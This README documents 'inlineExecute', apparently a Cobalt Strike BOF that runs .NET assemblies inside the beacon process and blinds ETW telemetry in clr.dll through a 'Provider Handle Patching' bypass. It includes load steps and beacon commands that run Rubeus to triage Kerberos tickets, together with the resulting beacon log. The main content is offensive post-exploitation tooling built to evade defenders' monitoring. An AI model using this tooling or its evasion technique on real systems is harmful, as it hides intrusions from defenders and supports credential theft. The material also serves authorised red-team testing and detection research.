inlineExecute is a Cobalt Strike BOF that executes a .NET assembly in the current process (rather than spawning a sacrificial process, as execute-assembly does).
It stands as a POC and as a boilerplate for experimenting with novel techniques in the future.
Currently, it implements a novel ETW bypass technique: Provider Handle Patching. It is documented in my blog - A Stealthier Reflective Loading.
The Provider Handle Patching technique prevents ETW telemetry from being generated by userland hooks in clr.dll.
Unlike traditional ETW patching techniques, it does not modify memory protections and does not require suspicious WinAPIs such as WriteProcessMemory, NtWriteVirtualMemory, VirtualProtect, or NtProtectVirtualMemory.
Load inlineExecute.cna from Cobalt Strike -> Script Manager -> Load. Ensure that inlineExecute.o and inlineExecute.cna are in the same directory.
beacon> inlineExecute
[+] Usage: inlineExecute [-etw] [-verbose] <filepath> <args>
The -etw flag patches ETW in clr.dll.
inlineExecute -etw /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
The -verbose flag outputs debugging information.
inlineExecute -verbose -etw /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
Example usage with Rubeus.exe triage.
[11/29 04:08:35] beacon> inlineExecute -etw /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
[11/29 04:08:35] [+] Executing: /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe
[11/29 04:08:35] [+] Arguments: triage
[11/29 04:08:37] [+] host called home, sent: 459528 bytes
[11/29 04:08:37] [+] received output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0x1bc1b
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
[11/29 04:08:37] [+] received output:
[+] Done